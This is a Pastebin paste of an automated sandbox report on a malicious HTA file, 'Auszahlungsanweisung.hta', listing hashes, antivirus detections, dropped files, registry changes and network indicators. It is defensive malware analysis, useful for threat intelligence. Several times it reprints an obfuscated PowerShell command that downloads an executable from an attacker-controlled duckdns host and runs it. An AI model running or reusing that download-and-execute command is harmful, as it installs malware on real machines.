API tools faq
paste
paladin316

Auszahlungsanweisung_hta_2019-08-29_02_30.txt

paladin316
Aug 28th, 2019
2,005
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.85 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 395
  3. * MalFamily: ""
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Auszahlungsanweisung.hta"
  8. * File Size: 12537
  9. * File Type: "HTML document, ASCII text, with very long lines, with CRLF line terminators"
  10. * SHA256: "b636b8a8ac2d6ec1a4fcbb5444ff7a9cc721aa7766a85d03823e2be98392d473"
  11. * MD5: "5fdd9504398dd82b20ea814e6091c55e"
  12. * SHA1: "09f414750aa2966cea9f29ca2baa4482f5cb3d96"
  13. * SHA512: "16fde83fb041f8eadaf915d309d518bed2c4777241fab5f57ae1e905a58fc6b6ad9e2d014229088206a639addff906be5b7c44ecd0a205983bccd27cd1fa7ab6"
  14. * CRC32: "20442F8B"
  15. * SSDEEP: "192:EaTLEmwbyaf1QTjGH0hOQHW3nRkQ4fNnaQBYgwri6toT:tLEmwbyaf1QTyH0wQHGnRkQ4paQBP"
  16.  
  17. * Process Execution:
  18. "mshta.exe",
  19. "poWERSHeLl.EXe",
  20. "VirtualoxPureSDLFrontend.exe"
  21.  
  22.  
  23. * Executed Commands:
  24. "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\"",
  25. "\"C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe\"",
  26. "C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe "
  27.  
  28.  
  29. * Signatures Detected:
  30.  
  31. "Description": "Behavioural detection: Executable code extraction",
  32. "Details":
  33.  
  34.  
  35. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  36. "Details":
  37.  
  38.  
  39. "Description": "Guard pages use detected - possible anti-debugging.",
  40. "Details":
  41.  
  42.  
  43. "Description": "A HTTP/S link was seen in a script or command line",
  44. "Details":
  45.  
  46. "command": "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\""
  47.  
  48.  
  49.  
  50.  
  51. "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
  52. "Details":
  53.  
  54. "command": "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\""
  55.  
  56.  
  57.  
  58.  
  59. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  60. "Details":
  61.  
  62. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  63.  
  64.  
  65. "suspicious_request": "http://westernautoweb.duckdns.org:8447/sol.exe"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Performs some HTTP requests",
  71. "Details":
  72.  
  73. "url": "http://westernautoweb.duckdns.org:8447/sol.exe"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "A scripting utility was executed",
  79. "Details":
  80.  
  81. "command": "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\""
  82.  
  83.  
  84.  
  85.  
  86. "Description": "Attempts to execute a powershell command with suspicious parameter/s",
  87. "Details":
  88.  
  89. "file_download": "Uses powershell to download a file"
  90.  
  91.  
  92.  
  93.  
  94. "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
  95. "Details":
  96.  
  97. "Baidu": "JS.Trojan.Kryptik.to"
  98.  
  99.  
  100. "Symantec": "Downloader"
  101.  
  102.  
  103. "ESET-NOD32": "PowerShell/TrojanDownloader.Agent.QV"
  104.  
  105.  
  106. "TrendMicro-HouseCall": "Trojan.HTML.POWLOAD.THHBHAI"
  107.  
  108.  
  109. "Kaspersky": "HEUR:Trojan.Script.SAgent.gen"
  110.  
  111.  
  112. "NANO-Antivirus": "Trojan.Script.ExpKit.eurlzq"
  113.  
  114.  
  115. "AegisLab": "Trojan.Script.SAgent.4!c"
  116.  
  117.  
  118. "Rising": "Downloader.Agent!8.B23 (TOPIS:E0:HZ7GGfTwi0Q)"
  119.  
  120.  
  121. "F-Secure": "Malware.HTML/Agent.bbk"
  122.  
  123.  
  124. "DrWeb": "Trojan.DownLoader30.15068"
  125.  
  126.  
  127. "TrendMicro": "Trojan.HTML.POWLOAD.THHBHAI"
  128.  
  129.  
  130. "McAfee-GW-Edition": "BehavesLike.HTML.Downloader.lx"
  131.  
  132.  
  133. "ZoneAlarm": "HEUR:Trojan.Script.SAgent.gen"
  134.  
  135.  
  136. "GData": "HTML.Trojan.Agent.SXTTZC"
  137.  
  138.  
  139. "Zoner": "Probably HTMLUnescape"
  140.  
  141.  
  142. "Tencent": "Win32.Trojan-downloader.Agent.Tbjh"
  143.  
  144.  
  145. "Ikarus": "Trojan-Downloader.PowerShell.Agent"
  146.  
  147.  
  148. "Qihoo-360": "Win32/Trojan.Script.b80"
  149.  
  150.  
  151.  
  152.  
  153. "Description": "Drops a binary and executes it",
  154. "Details":
  155.  
  156. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe"
  157.  
  158.  
  159.  
  160.  
  161. "Description": "Created network traffic indicative of malicious activity",
  162. "Details":
  163.  
  164. "signature": "ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile"
  165.  
  166.  
  167.  
  168.  
  169.  
  170. * Started Service:
  171.  
  172. * Mutexes:
  173. "CicLoadWinStaWinSta0",
  174. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  175. "Global\\CLR_PerfMon_WrapMutex",
  176. "Global\\CLR_CASOFF_MUTEX",
  177. "Global\\.net clr networking"
  178.  
  179.  
  180. * Modified Files:
  181. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  182. "\\??\\PIPE\\srvsvc",
  183. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RV40Z3BSV7K62H76GA4B.temp",
  184. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  185. "C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe"
  186.  
  187.  
  188. * Deleted Files:
  189. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RV40Z3BSV7K62H76GA4B.temp",
  190. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2372.25631515",
  191. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2372.25631515",
  192. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2372.25631515"
  193.  
  194.  
  195. * Modified Registry Keys:
  196. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  197. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32",
  198. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\EnableFileTracing",
  199. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\EnableConsoleTracing",
  200. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\FileTracingMask",
  201. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\ConsoleTracingMask",
  202. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\MaxFileSize",
  203. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\FileDirectory"
  204.  
  205.  
  206. * Deleted Registry Keys:
  207.  
  208. * DNS Communications:
  209.  
  210. "type": "A",
  211. "request": "westernautoweb.duckdns.org",
  212. "answers":
  213.  
  214. "data": "79.134.225.95",
  215. "type": "A"
  216.  
  217.  
  218.  
  219.  
  220.  
  221. * Domains:
  222.  
  223. "ip": "79.134.225.95",
  224. "domain": "westernautoweb.duckdns.org"
  225.  
  226.  
  227.  
  228. * Network Communication - ICMP:
  229.  
  230. * Network Communication - HTTP:
  231.  
  232. "count": 1,
  233. "body": "",
  234. "uri": "http://westernautoweb.duckdns.org:8447/sol.exe",
  235. "user-agent": "",
  236. "method": "GET",
  237. "host": "westernautoweb.duckdns.org:8447",
  238. "version": "1.1",
  239. "path": "/sol.exe",
  240. "data": "GET /sol.exe HTTP/1.1\r\nHost: westernautoweb.duckdns.org:8447\r\nConnection: Keep-Alive\r\n\r\n",
  241. "port": 8447
  242.  
  243.  
  244.  
  245. * Network Communication - SMTP:
  246.  
  247. * Network Communication - Hosts:
  248.  
  249. "country_name": "Switzerland",
  250. "ip": "79.134.225.95",
  251. "inaddrarpa": "",
  252. "hostname": "westernautoweb.duckdns.org"
  253.  
  254.  
  255.  
  256. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!